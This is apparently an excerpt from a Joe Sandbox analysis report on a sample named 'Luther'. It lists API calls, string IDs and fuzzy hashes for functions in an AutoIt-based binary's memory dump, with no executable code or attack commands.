                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000D.00000002.4496298656.0000000000E31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00E30000, based on PE: true
                                                                                                          • Associated: 0000000D.00000002.4496278367.0000000000E30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496351455.0000000000ECD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496351455.0000000000EF3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496401468.0000000000EFD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496429419.0000000000F05000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_13_2_e30000_Luther.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
                                                                                                          • String ID: ($0$tooltips_class32
                                                                                                          • API String ID: 698492251-4156429822
                                                                                                          • Opcode ID: 3f800943dbe2d7b5688b217dd5706ef1609a5c4280c78546dbca3caa7e181428
                                                                                                          • Instruction ID: 0461eed6514ad35d94541e61e5d1fee1c8291c8d215eaa5def72c482764bc2a2
                                                                                                          • Opcode Fuzzy Hash: 3f800943dbe2d7b5688b217dd5706ef1609a5c4280c78546dbca3caa7e181428
                                                                                                          • Instruction Fuzzy Hash: 0BB19C71608301AFD714DF65C984F6AFBE5EF85314F00995CF999AB292C732E806CB92
                                                                                                          APIs
                                                                                                          • CharUpperBuffW.USER32(?,?), ref: 00EC0D81
                                                                                                          • _wcslen.LIBCMT ref: 00EC0DBB
                                                                                                          • _wcslen.LIBCMT ref: 00EC0E25
                                                                                                          • _wcslen.LIBCMT ref: 00EC0E8D
                                                                                                          • _wcslen.LIBCMT ref: 00EC0F11
                                                                                                          • SendMessageW.USER32(?,00001032,00000000,00000000), ref: 00EC0F61
                                                                                                          • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00EC0FA0
                                                                                                            • Part of subcall function 00E4FD52: _wcslen.LIBCMT ref: 00E4FD5D
                                                                                                            • Part of subcall function 00E92B8C: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00E92BA5
                                                                                                            • Part of subcall function 00E92B8C: SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00E92BD7
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000D.00000002.4496298656.0000000000E31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00E30000, based on PE: true
                                                                                                          • Associated: 0000000D.00000002.4496278367.0000000000E30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496351455.0000000000ECD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496351455.0000000000EF3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496401468.0000000000EFD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496429419.0000000000F05000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_13_2_e30000_Luther.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: _wcslen$MessageSend$BuffCharUpper
                                                                                                          • String ID: DESELECT$FINDITEM$GETITEMCOUNT$GETSELECTED$GETSELECTEDCOUNT$GETSUBITEMCOUNT$GETTEXT$ISSELECTED$SELECT$SELECTALL$SELECTCLEAR$SELECTINVERT$VIEWCHANGE
                                                                                                          • API String ID: 1103490817-719923060
                                                                                                          • Opcode ID: b38cad0e8b5a1df2668782f12e1988804cc71e07f29aaf4631b722115e4af129
                                                                                                          • Instruction ID: 5e826012df8e72db52df1808d890c6f9511493400ea4436d720583ecac960fa4
                                                                                                          • Opcode Fuzzy Hash: b38cad0e8b5a1df2668782f12e1988804cc71e07f29aaf4631b722115e4af129
                                                                                                          • Instruction Fuzzy Hash: 8AE18D312043418FCB14DF24CA51A7AB7E5BF85318B14696CF496B73A2DB32ED46CB91
                                                                                                          APIs
                                                                                                          • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 00E325F8
                                                                                                          • GetSystemMetrics.USER32(00000007), ref: 00E32600
                                                                                                          • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 00E3262B
                                                                                                          • GetSystemMetrics.USER32(00000008), ref: 00E32633
                                                                                                          • GetSystemMetrics.USER32(00000004), ref: 00E32658
                                                                                                          • SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 00E32675
                                                                                                          • AdjustWindowRectEx.USER32(000000FF,?,00000000,?), ref: 00E32685
                                                                                                          • CreateWindowExW.USER32(?,AutoIt v3 GUI,?,?,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 00E326B8
                                                                                                          • SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 00E326CC
                                                                                                          • GetClientRect.USER32(00000000,000000FF), ref: 00E326EA
                                                                                                          • GetStockObject.GDI32(00000011), ref: 00E32706
                                                                                                          • SendMessageW.USER32(00000000,00000030,00000000), ref: 00E32711
                                                                                                            • Part of subcall function 00E319CD: GetCursorPos.USER32(?), ref: 00E319E1
                                                                                                            • Part of subcall function 00E319CD: ScreenToClient.USER32(00000000,?), ref: 00E319FE
                                                                                                            • Part of subcall function 00E319CD: GetAsyncKeyState.USER32(00000001), ref: 00E31A23
                                                                                                            • Part of subcall function 00E319CD: GetAsyncKeyState.USER32(00000002), ref: 00E31A3D
                                                                                                          • SetTimer.USER32(00000000,00000000,00000028,00E3199C), ref: 00E32738
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000D.00000002.4496298656.0000000000E31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00E30000, based on PE: true
                                                                                                          • Associated: 0000000D.00000002.4496278367.0000000000E30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496351455.0000000000ECD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496351455.0000000000EF3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496401468.0000000000EFD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496429419.0000000000F05000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_13_2_e30000_Luther.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
                                                                                                          • String ID: AutoIt v3 GUI
                                                                                                          • API String ID: 1458621304-248962490
                                                                                                          • Opcode ID: d1af0098ee90e6eb942516a35b99f77f3e2e40a47b0b11f55ed1abc9f5964b66
                                                                                                          • Instruction ID: f6ccdf5ccd41c8227556506d1d4af08fea68e4976ebf8d8a5fd07f07fc40449a
                                                                                                          • Opcode Fuzzy Hash: d1af0098ee90e6eb942516a35b99f77f3e2e40a47b0b11f55ed1abc9f5964b66
                                                                                                          • Instruction Fuzzy Hash: E9B18D31A002099FDB54DFA8CC89FAE7BB5FB88314F109129FA49B7290D771E941DB51
                                                                                                          APIs
                                                                                                            • Part of subcall function 00E91A45: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00E91A60
                                                                                                            • Part of subcall function 00E91A45: GetLastError.KERNEL32(?,00000000,00000000,?,?,00E914E7,?,?,?), ref: 00E91A6C
                                                                                                            • Part of subcall function 00E91A45: GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,00E914E7,?,?,?), ref: 00E91A7B
                                                                                                            • Part of subcall function 00E91A45: HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,00E914E7,?,?,?), ref: 00E91A82
                                                                                                            • Part of subcall function 00E91A45: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00E91A99
                                                                                                          • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00E91741
                                                                                                          • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00E91775
                                                                                                          • GetLengthSid.ADVAPI32(?), ref: 00E9178C
                                                                                                          • GetAce.ADVAPI32(?,00000000,?), ref: 00E917C6
                                                                                                          • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00E917E2
                                                                                                          • GetLengthSid.ADVAPI32(?), ref: 00E917F9
                                                                                                          • GetProcessHeap.KERNEL32(00000008,00000008), ref: 00E91801
                                                                                                          • HeapAlloc.KERNEL32(00000000), ref: 00E91808
                                                                                                          • GetLengthSid.ADVAPI32(?,00000008,?), ref: 00E91829
                                                                                                          • CopySid.ADVAPI32(00000000), ref: 00E91830
                                                                                                          • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00E9185F
                                                                                                          • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00E91881
                                                                                                          • SetUserObjectSecurity.USER32(?,00000004,?), ref: 00E91893
                                                                                                          • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00E918BA
                                                                                                          • HeapFree.KERNEL32(00000000), ref: 00E918C1
                                                                                                          • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00E918CA
                                                                                                          • HeapFree.KERNEL32(00000000), ref: 00E918D1
                                                                                                          • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00E918DA
                                                                                                          • HeapFree.KERNEL32(00000000), ref: 00E918E1
                                                                                                          • GetProcessHeap.KERNEL32(00000000,?), ref: 00E918ED
                                                                                                          • HeapFree.KERNEL32(00000000), ref: 00E918F4
                                                                                                            • Part of subcall function 00E91ADF: GetProcessHeap.KERNEL32(00000008,00E914FD,?,00000000,?,00E914FD,?), ref: 00E91AED
                                                                                                            • Part of subcall function 00E91ADF: HeapAlloc.KERNEL32(00000000,?,00000000,?,00E914FD,?), ref: 00E91AF4
                                                                                                            • Part of subcall function 00E91ADF: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00000000,?,00E914FD,?), ref: 00E91B03
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000D.00000002.4496298656.0000000000E31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00E30000, based on PE: true
                                                                                                          • Associated: 0000000D.00000002.4496278367.0000000000E30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496351455.0000000000ECD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496351455.0000000000EF3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496401468.0000000000EFD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496429419.0000000000F05000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_13_2_e30000_Luther.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Heap$Process$Security$Free$AllocDescriptorLengthObjectUser$Dacl$CopyErrorInformationInitializeLast
                                                                                                          • String ID:
                                                                                                          • API String ID: 4175595110-0
                                                                                                          • Opcode ID: 8f04cbb684e36fe528bb32c084838bcf4b496b1ded33b58d78bc22523c72eccd
                                                                                                          • Instruction ID: e7dadf0c49b390f3b9fe5a1423a9c1ce8323fe82549570f5138415561e33f42d
                                                                                                          • Opcode Fuzzy Hash: 8f04cbb684e36fe528bb32c084838bcf4b496b1ded33b58d78bc22523c72eccd
                                                                                                          • Instruction Fuzzy Hash: AD7149B2D0420ABFDF20DFA6DC45FAEBBB9BF04314F144165E915B6290D7729A06CB60
                                                                                                          APIs
                                                                                                          • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00EBCF1D
                                                                                                          • RegCreateKeyExW.ADVAPI32(?,?,00000000,00ECDCD0,00000000,?,00000000,?,?), ref: 00EBCFA4
                                                                                                          • RegCloseKey.ADVAPI32(00000000,00000000,00000000), ref: 00EBD004
                                                                                                          • _wcslen.LIBCMT ref: 00EBD054
                                                                                                          • _wcslen.LIBCMT ref: 00EBD0CF
                                                                                                          • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000001,?,?), ref: 00EBD112
                                                                                                          • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000007,?,?), ref: 00EBD221
                                                                                                          • RegSetValueExW.ADVAPI32(00000001,?,00000000,0000000B,?,00000008), ref: 00EBD2AD
                                                                                                          • RegCloseKey.ADVAPI32(?), ref: 00EBD2E1
                                                                                                          • RegCloseKey.ADVAPI32(00000000), ref: 00EBD2EE
                                                                                                          • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000003,00000000,00000000), ref: 00EBD3C0
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000D.00000002.4496298656.0000000000E31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00E30000, based on PE: true
                                                                                                          • Associated: 0000000D.00000002.4496278367.0000000000E30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496351455.0000000000ECD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496351455.0000000000EF3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496401468.0000000000EFD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496429419.0000000000F05000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_13_2_e30000_Luther.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Value$Close$_wcslen$ConnectCreateRegistry
                                                                                                          • String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
                                                                                                          • API String ID: 9721498-966354055
                                                                                                          • Opcode ID: 3d411e2f37c772352b6a5fd9ca0d240762b9ef97de424c637303a32e18ff2af3
                                                                                                          • Instruction ID: 12b6eae7d7737962685d489f95edfea04fa0d7a6dc34e8dc20f3bf5896865974
                                                                                                          • Opcode Fuzzy Hash: 3d411e2f37c772352b6a5fd9ca0d240762b9ef97de424c637303a32e18ff2af3
                                                                                                          • Instruction Fuzzy Hash: 401259756082019FC714DF14C985A6ABBF5EF88714F14989CF98AAB3A2DB31FD41CB81
                                                                                                          APIs
                                                                                                          • CharUpperBuffW.USER32(?,?), ref: 00EC1462
                                                                                                          • _wcslen.LIBCMT ref: 00EC149D
                                                                                                          • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00EC14F0
                                                                                                          • _wcslen.LIBCMT ref: 00EC1526
                                                                                                          • _wcslen.LIBCMT ref: 00EC15A2
                                                                                                          • _wcslen.LIBCMT ref: 00EC161D
                                                                                                            • Part of subcall function 00E4FD52: _wcslen.LIBCMT ref: 00E4FD5D
                                                                                                            • Part of subcall function 00E93535: SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00E93547
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000D.00000002.4496298656.0000000000E31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00E30000, based on PE: true
                                                                                                          • Associated: 0000000D.00000002.4496278367.0000000000E30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496351455.0000000000ECD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496351455.0000000000EF3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496401468.0000000000EFD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496429419.0000000000F05000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_13_2_e30000_Luther.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: _wcslen$MessageSend$BuffCharUpper
                                                                                                          • String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
                                                                                                          • API String ID: 1103490817-4258414348
                                                                                                          • Opcode ID: ab09b02d9034d3393164e18413d5c1de6174e43299077f6d0ec0e791a332a9ce
                                                                                                          • Instruction ID: 91fe44c45dfc26a692dcc86548747119751a70512cf0110f933a210c9c19a307
                                                                                                          • Opcode Fuzzy Hash: ab09b02d9034d3393164e18413d5c1de6174e43299077f6d0ec0e791a332a9ce
                                                                                                          • Instruction Fuzzy Hash: 99E1A1316083018FCB14DF24C651A6AB7E2BF95314F14699DF896B73A2CB32ED46CB81
                                                                                                          APIs
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000D.00000002.4496298656.0000000000E31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00E30000, based on PE: true
                                                                                                          • Associated: 0000000D.00000002.4496278367.0000000000E30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496351455.0000000000ECD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496351455.0000000000EF3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496401468.0000000000EFD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496429419.0000000000F05000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_13_2_e30000_Luther.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: _wcslen$BuffCharUpper
                                                                                                          • String ID: HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
                                                                                                          • API String ID: 1256254125-909552448
                                                                                                          • Opcode ID: 8957cfb937175315e26fb90b862dabbe76dd79995688e5b421d81b511f65e4be
                                                                                                          • Instruction ID: a89f26a5b26922c8f18fa98a1235dae3422c051ed512f5162e0315a05942e362
                                                                                                          • Opcode Fuzzy Hash: 8957cfb937175315e26fb90b862dabbe76dd79995688e5b421d81b511f65e4be
                                                                                                          • Instruction Fuzzy Hash: ED71077260811A8BCB209E7CCE416FB33A1ABA075CB253125FD66F7294FA31DD45C3A0
                                                                                                          APIs
                                                                                                          • _wcslen.LIBCMT ref: 00EC8DB5
                                                                                                          • _wcslen.LIBCMT ref: 00EC8DC9
                                                                                                          • _wcslen.LIBCMT ref: 00EC8DEC
                                                                                                          • _wcslen.LIBCMT ref: 00EC8E0F
                                                                                                          • LoadImageW.USER32(00000000,?,00000001,?,?,00002010), ref: 00EC8E4D
                                                                                                          • LoadLibraryExW.KERNEL32(?,00000000,00000032,00000000,?,?,?,?,?,00EC6691), ref: 00EC8EA9
                                                                                                          • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 00EC8EE2
                                                                                                          • LoadImageW.USER32(00000000,?,00000001,?,?,00000000), ref: 00EC8F25
                                                                                                          • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 00EC8F5C
                                                                                                          • FreeLibrary.KERNEL32(?), ref: 00EC8F68
                                                                                                          • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 00EC8F78
                                                                                                          • DestroyIcon.USER32(?,?,?,?,?,00EC6691), ref: 00EC8F87
                                                                                                          • SendMessageW.USER32(?,00000170,00000000,00000000), ref: 00EC8FA4
                                                                                                          • SendMessageW.USER32(?,00000064,00000172,00000001), ref: 00EC8FB0
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000D.00000002.4496298656.0000000000E31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00E30000, based on PE: true
                                                                                                          • Associated: 0000000D.00000002.4496278367.0000000000E30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496351455.0000000000ECD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496351455.0000000000EF3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496401468.0000000000EFD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496429419.0000000000F05000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_13_2_e30000_Luther.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Load$Image_wcslen$IconLibraryMessageSend$DestroyExtractFree
                                                                                                          • String ID: .dll$.exe$.icl
                                                                                                          • API String ID: 799131459-1154884017
                                                                                                          • Opcode ID: 9c357bf06727928637fbb504665ce4fcf18a7bc82cab9975526f3e4f025928b8
                                                                                                          • Instruction ID: 901a504f4adb532915539834a069fe22c7451533c103a995c7a42770e013395e
                                                                                                          • Opcode Fuzzy Hash: 9c357bf06727928637fbb504665ce4fcf18a7bc82cab9975526f3e4f025928b8
                                                                                                          • Instruction Fuzzy Hash: FC612571600208BEEB14DF64CE45FBE77A8BF08B15F10551AF915F61D0DB72A986CBA0
                                                                                                          APIs
                                                                                                          • CharLowerBuffW.USER32(?,?), ref: 00EA493D
                                                                                                          • _wcslen.LIBCMT ref: 00EA4948
                                                                                                          • _wcslen.LIBCMT ref: 00EA499F
                                                                                                          • _wcslen.LIBCMT ref: 00EA49DD
                                                                                                          • GetDriveTypeW.KERNEL32(?), ref: 00EA4A1B
                                                                                                          • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00EA4A63
                                                                                                          • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00EA4A9E
                                                                                                          • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00EA4ACC
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000D.00000002.4496298656.0000000000E31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00E30000, based on PE: true
                                                                                                          • Associated: 0000000D.00000002.4496278367.0000000000E30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496351455.0000000000ECD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496351455.0000000000EF3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496401468.0000000000EFD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496429419.0000000000F05000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_13_2_e30000_Luther.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: SendString_wcslen$BuffCharDriveLowerType
                                                                                                          • String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
                                                                                                          • API String ID: 1839972693-4113822522
                                                                                                          • Opcode ID: 752b9bfb91106ee804d2dbd28eb9f0f8fa1f7a72cb65965da4222f824e9f3f78
                                                                                                          • Instruction ID: f528216ca87ae56b093e4baf21e9841a4222668c850133a8937368e7db16c548
                                                                                                          • Opcode Fuzzy Hash: 752b9bfb91106ee804d2dbd28eb9f0f8fa1f7a72cb65965da4222f824e9f3f78
                                                                                                          • Instruction Fuzzy Hash: B571BFB25082069FC310EF24C84196BBBE4EFD9758F00692DF895AB291EB71ED45CB91
                                                                                                          APIs
                                                                                                          • LoadIconW.USER32(00000063), ref: 00E96395
                                                                                                          • SendMessageW.USER32(?,00000080,00000000,00000000), ref: 00E963A7
                                                                                                          • SetWindowTextW.USER32(?,?), ref: 00E963BE
                                                                                                          • GetDlgItem.USER32(?,000003EA), ref: 00E963D3
                                                                                                          • SetWindowTextW.USER32(00000000,?), ref: 00E963D9
                                                                                                          • GetDlgItem.USER32(?,000003E9), ref: 00E963E9
                                                                                                          • SetWindowTextW.USER32(00000000,?), ref: 00E963EF
                                                                                                          • SendDlgItemMessageW.USER32(?,000003E9,000000CC,?,00000000), ref: 00E96410
                                                                                                          • SendDlgItemMessageW.USER32(?,000003E9,000000C5,00000000,00000000), ref: 00E9642A
                                                                                                          • GetWindowRect.USER32(?,?), ref: 00E96433
                                                                                                          • _wcslen.LIBCMT ref: 00E9649A
                                                                                                          • SetWindowTextW.USER32(?,?), ref: 00E964D6
                                                                                                          • GetDesktopWindow.USER32 ref: 00E964DC
                                                                                                          • GetWindowRect.USER32(00000000), ref: 00E964E3
                                                                                                          • MoveWindow.USER32(?,?,00000080,00000000,?,00000000), ref: 00E9653A
                                                                                                          • GetClientRect.USER32(?,?), ref: 00E96547
                                                                                                          • PostMessageW.USER32(?,00000005,00000000,?), ref: 00E9656C
                                                                                                          • SetTimer.USER32(?,0000040A,00000000,00000000), ref: 00E96596
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000D.00000002.4496298656.0000000000E31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00E30000, based on PE: true
                                                                                                          • Associated: 0000000D.00000002.4496278367.0000000000E30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496351455.0000000000ECD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496351455.0000000000EF3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496401468.0000000000EFD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496429419.0000000000F05000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_13_2_e30000_Luther.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer_wcslen
                                                                                                          • String ID:
                                                                                                          • API String ID: 895679908-0
                                                                                                          • Opcode ID: 3c16f6acb7aa98cf902e34afaa439668c6d82a445ded3155fbf90a883a3fcb48
                                                                                                          • Instruction ID: 780b008b37c7d49bb9e8fd1e448b0e4ca4799de13e789adad740c15b7e104787
                                                                                                          • Opcode Fuzzy Hash: 3c16f6acb7aa98cf902e34afaa439668c6d82a445ded3155fbf90a883a3fcb48
                                                                                                          • Instruction Fuzzy Hash: 15718C31900609AFDF20DFA9CE45EAEBBF5FF48708F100929E596B25A0D776E944CB50
                                                                                                          APIs
                                                                                                          • LoadCursorW.USER32(00000000,00007F89), ref: 00EB0884
                                                                                                          • LoadCursorW.USER32(00000000,00007F8A), ref: 00EB088F
                                                                                                          • LoadCursorW.USER32(00000000,00007F00), ref: 00EB089A
                                                                                                          • LoadCursorW.USER32(00000000,00007F03), ref: 00EB08A5
                                                                                                          • LoadCursorW.USER32(00000000,00007F8B), ref: 00EB08B0
                                                                                                          • LoadCursorW.USER32(00000000,00007F01), ref: 00EB08BB
                                                                                                          • LoadCursorW.USER32(00000000,00007F81), ref: 00EB08C6
                                                                                                          • LoadCursorW.USER32(00000000,00007F88), ref: 00EB08D1
                                                                                                          • LoadCursorW.USER32(00000000,00007F80), ref: 00EB08DC
                                                                                                          • LoadCursorW.USER32(00000000,00007F86), ref: 00EB08E7
                                                                                                          • LoadCursorW.USER32(00000000,00007F83), ref: 00EB08F2
                                                                                                          • LoadCursorW.USER32(00000000,00007F85), ref: 00EB08FD
                                                                                                          • LoadCursorW.USER32(00000000,00007F82), ref: 00EB0908
                                                                                                          • LoadCursorW.USER32(00000000,00007F84), ref: 00EB0913
                                                                                                          • LoadCursorW.USER32(00000000,00007F04), ref: 00EB091E
                                                                                                          • LoadCursorW.USER32(00000000,00007F02), ref: 00EB0929
                                                                                                          • GetCursorInfo.USER32(?), ref: 00EB0939
                                                                                                          • GetLastError.KERNEL32 ref: 00EB097B
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000D.00000002.4496298656.0000000000E31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00E30000, based on PE: true
                                                                                                          • Associated: 0000000D.00000002.4496278367.0000000000E30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496351455.0000000000ECD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496351455.0000000000EF3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496401468.0000000000EFD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496429419.0000000000F05000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_13_2_e30000_Luther.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Cursor$Load$ErrorInfoLast
                                                                                                          • String ID:
                                                                                                          • API String ID: 3215588206-0
                                                                                                          • Opcode ID: f387e205a5cb04b78eab1e60be2e030aaaa79391bfb97752f4b12670c621fe44
                                                                                                          • Instruction ID: 7de75ad0e28587974d9372e917d2c2d004a78912e07fc03d8ce9116b3aabdefc
